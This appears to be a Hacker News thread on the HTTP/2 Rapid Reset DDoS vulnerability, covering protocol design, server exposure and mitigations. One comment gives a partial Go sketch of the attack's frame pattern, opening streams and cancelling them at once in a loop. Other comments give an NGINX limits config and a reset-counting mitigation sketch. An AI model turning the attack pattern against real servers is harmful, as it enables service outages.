dang · 2 years ago
Related ongoing threads:

The largest DDoS attack to date, peaking above 398M rps - https://news.ycombinator.com/item?id=37831062

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks - https://news.ycombinator.com/item?id=37830998

comice · 2 years ago
Nice to see that the haproxy people had spotted this kind of issue with http/2 and apparently mitigated it back in 2018: https://www.mail-archive.com/haproxy@formilux.org/msg44134.h...
jabart · 2 years ago
Nice, I was looking for this type of information for haproxy. Gives me a lot of confidence in their new QUIC feature.
vdfs · 2 years ago
If anyone is curious, Nginx is vulnerable to this:

https://www.nginx.com/blog/http-2-rapid-reset-attack-impacti...

obituary_latte · 2 years ago
IF configured away from the defaults:

> By relying on the default keepalive limit, NGINX prevents this type of attack. Creating additional connections to circumvent this limit exposes bad actors via standard layer 4 monitoring and alerting tools.

> However, if NGINX is configured with a keepalive that is substantially higher than the default and recommended setting, the attack may deplete system resources.
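
For reference, this is roughly what those limits look like spelled out in a config. The directive names are from the NGINX docs and the values are, as far as I know, the shipped defaults in recent releases, so you'd only write them explicitly if you wanted to deviate from them:

```nginx
http {
    # Close a keepalive connection after this many requests. The default
    # already bounds how much work a single client connection can request.
    keepalive_requests 1000;

    # Cap on concurrently open streams per HTTP/2 connection.
    http2_max_concurrent_streams 128;
}
```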

js2 · 2 years ago
> In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

I'm surprised this wasn't foreseen when HTTP/2 was designed. Amplification attacks were already well known from other protocols.

I'm similarly surprised it took this long for this attack to surface, but maybe HTTP/2 wasn't widely enough deployed to be a worthwhile target till recently?

tptacek · 2 years ago
It's not really an amplification attack. It's just a drastically more efficient use of TCP connections.
callalex · 2 years ago
Isn’t any kind of attack where a little bit of effort from the attacker causes a lot of work for the victim an amplification attack? Or do you only consider it an amplification attack if it is exploiting layer 3?

I tried looking it up and couldn’t find an authoritative answer. Can you recommend a resource that you like for this subject?

js2 · 2 years ago
You're right. I hadn't had my coffee yet and the asymmetric cost reminded me of amplification attacks. I'm still surprised this attack wasn't foreseen though. It just doesn't seem all that clever or original.
gnfargbl · 2 years ago
I was surprised too, but if you look at the timelines then RST_STREAM seems to have been present in early versions of SPDY, and SPDY seems mostly to have been designed around 2009. Attacks like Slowloris were coming out at about the same time, but they weren't well-known.

On the other hand, SYN cookies were introduced in 1996, so there's definitely some historic precedent for attacks in the (victim pays Y, attacker pays X, X<<Y) class.

c0l0 · 2 years ago
If you are working on the successor protocol of HTTP/1.1, and are not aware of Slowloris the moment it hits and every serious httpd implementation out there gets patched to mitigate it, I'd argue you are in the wrong line of work.
kristopolous · 2 years ago
> I'm similarly surprised it took this long for this attack to surface

As with most things like this, probably many hundreds of unimportant people saw it and tried it out.

Trying to do it on Google, with a serious effort, that's the wacky part.

sangnoir · 2 years ago
> Trying to do it on Google, with a serious effort, that's the wacky part

If I were the FBI, I'd be looking at people with recently bought Google puts expiring soon. I can't imagine anyone taking a swing at Google infra "for the lulz". Also in contention: nation-states doing a practice run.

the8472 · 2 years ago
So we needed HTTP2 to deliver ads, trackers and bloated frontend frameworks faster. And now it delivers attacks faster too.
jeroenhd · 2 years ago
HTTP/2 makes the browsing experience of high-latency connections a lot more tolerable. It also makes loading web pages in general faster.

Luckily, HTTP/1.1 still works. You can always enable it in your browser configuration and in your web servers if you don't like the protocol.

tlamponi · 2 years ago
> HTTP/2 makes the browsing experience of high-latency connections a lot more tolerable. It also makes loading web pages in general faster.

HTTP/3 does that quite a bit better in my experience (lots of train rides with spotty onboard Wi-Fi), though, since HTTP/2 is still affected by TCP head-of-line blocking: a single lost packet can stall all the other streams, even if it didn't carry data for them.

shepherdjerred · 2 years ago
Are you suggesting that we didn't need HTTP2? What's the real alternative here?
the8472 · 2 years ago
In some alternative history there would have been a push to make HTTP/1.1 pipelining work, trim the fat from bloated websites (loading cookie consent banners from a third-party domain is a travesty on several levels), maybe use websockets for tiny API requests, and lean on the prioritization attributes on various resources. Then shoveling everything over ~2 TCP connections would have done the job?
bsder · 2 years ago
SCTP (Stream Control Transmission Protocol) or the equivalent. HTTP is really the wrong layer for things like bonding multiple connections, congestion adjustments, etc.

Unfortunately, most hosts and middleboxes (Windows included) only pass TCP and UDP, so evolving the transport layer is a dead end.

Thus you have to piggyback on what they will let through, so you're stuck with creating an HTTP flavor of TCP.

Etheryte · 2 years ago
Nothing in their comment claims that; there's no need to bring absurd strawmen into the discussion.

scrpl · 2 years ago
Another reason to keep foundational protocols small. HTTP/2 has been around for more than a decade (including SPDY), and this is the first time this attack type has surfaced. I wonder what surprises HTTP/3 and QUIC hide...
cmeacham98 · 2 years ago
DNS is a small protocol and is abused by DDoS actors worldwide for reflection attacks.
scrpl · 2 years ago
DNS is from 1983, give it some slack
kiitos · 2 years ago
DNS is an enormous protocol, almost unmeasurably large.
liveoneggs · 2 years ago
QUIC didn't account for amplification attacks in its design and the people complaining about it were initially dismissed.
londons_explore · 2 years ago
HTTP/2 is pretty small.
klabb3 · 2 years ago
“Cancelation” should really be added to the “hard CS problems” list.

Like the others on that list (off-by-one errors, cache invalidation, etc.) it isn't actually hard-hard, but rather underestimated and overlooked.

I think if we took half the time we spend on creation, constructors, initialization, and spent that design time thinking about destruction, cleanup, teardown, cancelation etc, we’d have a lot fewer bugs, in particular resource exhaustion bugs.

pornel · 2 years ago
I really like Rust's async for its ability to immediately cancel Futures, the entire call stack at once, at any await point, without needing cooperation from the individual calls.
winternewt · 2 years ago
How is that possible if e.g. an external SQL server needs to be told that the operation should be canceled?
jart · 2 years ago
I know that's true of C libraries. POSIX thread cancelation is one of those things whose mere existence has implications that pervade everything.
fefe23 · 2 years ago
I would like to remind everyone that Google invented HTTP/2.

Now they are spinning us a yarn about how they are heroically saving us from this problem, without mentioning the part where they created it.

The nerve of these tech companies! Microsoft has been doing this for decades, too.

gsich · 2 years ago
They tried to solve problems that didn't exist.
arisudesu · 2 years ago
Can anyone explain what's novel about this attack that isn't just a plain old request flood?
jsnell · 2 years ago
It depends on what you think a "request flood" attack is.

With HTTP/1.1 you could send one request per RTT [0]. With HTTP/2 multiplexing you could send 100 requests per RTT. With this attack you can send an indefinite number of requests per RTT.

I'd hope the diagram in this article (disclaimer: I'm a co-author) shows the difference, but maybe you mean yet another form of attack than the above?

[0] Modulo HTTP/1.1 pipelining which can cut out one RTT component, but basically no real clients use HTTP/1.1 pipelining, so its use would be a very crisp signal that it's abusive traffic.

tptacek · 2 years ago
I think for this audience a good clarification is:

* HTTP/1.1: 1 request per RTT per connection

* HTTP/2 multiplexing: 100 requests per RTT per connection

* HTTP/2 rapid reset: indefinite requests per connection

In each case attackers are grinding down a performance limitation they had with previous generations of the attack over HTTP. It is a request flood; the thing people need to keep in mind is that HTTP made these floods annoying to generate.
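
For the curious, here's a minimal sketch of what the rapid-reset pattern looks like on the wire, using Go's golang.org/x/net/http2 Framer purely as an illustration. Connection setup (TCP/TLS/ALPN) and reading the server's frames are omitted, and example.com is a placeholder:

```go
package main

import (
	"bytes"
	"net"

	"golang.org/x/net/http2"
	"golang.org/x/net/http2/hpack"
)

// rapidResetPattern illustrates the frame sequence on an already-established
// connection: each stream is opened with HEADERS and immediately cancelled
// with RST_STREAM, without ever waiting for the response.
func rapidResetPattern(conn net.Conn, streams int) error {
	// The client connection preface and a SETTINGS frame must come first.
	if _, err := conn.Write([]byte(http2.ClientPreface)); err != nil {
		return err
	}
	fr := http2.NewFramer(conn, conn)
	if err := fr.WriteSettings(); err != nil {
		return err
	}

	// Encode a minimal request header block once and reuse it.
	var hdrs bytes.Buffer
	enc := hpack.NewEncoder(&hdrs)
	for _, f := range []hpack.HeaderField{
		{Name: ":method", Value: "GET"},
		{Name: ":path", Value: "/"},
		{Name: ":scheme", Value: "https"},
		{Name: ":authority", Value: "example.com"},
	} {
		enc.WriteField(f)
	}

	for i := 0; i < streams; i++ {
		id := uint32(2*i + 1) // client-initiated streams use odd IDs
		if err := fr.WriteHeaders(http2.HeadersFrameParam{
			StreamID:      id,
			BlockFragment: hdrs.Bytes(),
			EndStream:     true,
			EndHeaders:    true,
		}); err != nil {
			return err
		}
		// Cancel right away: the reset stream stops counting against the
		// concurrent-stream limit, while the server may already be doing
		// work for it.
		if err := fr.WriteRSTStream(id, http2.ErrCodeCancel); err != nil {
			return err
		}
	}
	return nil
}

func main() {} // sketch only; establishing the connection is out of scope here
```

That's the whole trick: the per-connection concurrent-stream limit never fills up, because cancelled streams no longer count against it.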

arisudesu · 2 years ago
By request flood I mean just that: a request flood, as in sending an insanely high number of requests per unit of time (per second) to the target server to exhaust its resources.

You're right, with HTTP/1.1 we have a single request in flight (or none, in the keep-alive state) at any moment. But that doesn't limit the number of simultaneous connections from a single IP address. An attacker could use the whole TCP port space to create (theoretically) 65,535 connections to the server and send requests over them in parallel. This is a lot, too. In the pre-HTTP/2 era this could be mitigated by limiting the number of connections per IP address.

In HTTP/2, however, we can have multiple parallel connections, each with multiple parallel requests, at any moment; that is many times more than is possible with HTTP/1.x. But the preceding mitigation could still be implemented by applying it to the number of requests across all connections per IP address.

I guess this was overlooked in the implementations or in the protocol itself? Or rather, is it more difficult to apply restrictions because the L7 multiplexing happens entirely in userspace?

Added: The diagram in the article (the "HTTP/2 Rapid Reset attack" figure) doesn't really explain why this is an attack. In my thinking, as soon as a request is reset, the server's resources should be freed, so they aren't exhausted. I think this should be possible in modern async servers.

bribroder · 2 years ago
The new technique avoids the cap on the number of requests per second (per client) that the attacker can get the server to process. By sending both requests and stream resets within the same connection, the attacker can push more requests per connection/client than was previously possible, so the attack is cheaper and/or more difficult to stop.
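
The mitigations that servers and proxies shipped are, broadly speaking, in the spirit of the hypothetical sketch below: track client-initiated cancellations per connection and tear the whole connection down (GOAWAY) once they go far beyond what a legitimate client would plausibly need. The type, names, and threshold here are made up for illustration:

```go
package main

import "fmt"

// resetPolicy is a hypothetical per-connection counter: if a client cancels
// far more streams than it could plausibly need, the connection itself is
// treated as abusive.
type resetPolicy struct {
	resets    int
	maxResets int
}

// onRSTStream is called whenever the peer cancels a stream; it reports
// whether the connection should now be closed (e.g. with a GOAWAY frame).
func (p *resetPolicy) onRSTStream() (closeConn bool) {
	p.resets++
	return p.resets > p.maxResets
}

func main() {
	p := &resetPolicy{maxResets: 100} // threshold chosen arbitrarily for the example
	for i := 0; i < 150; i++ {
		if p.onRSTStream() {
			fmt.Println("too many cancelled streams; send GOAWAY and close the connection")
			break
		}
	}
}
```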
arisudesu · 2 years ago
Is it a fundamental HTTP/2 protocol issue or an implementation issue? Would this be an issue at all if a server enforced strict limits on requests per IP address, regardless of the number of connections?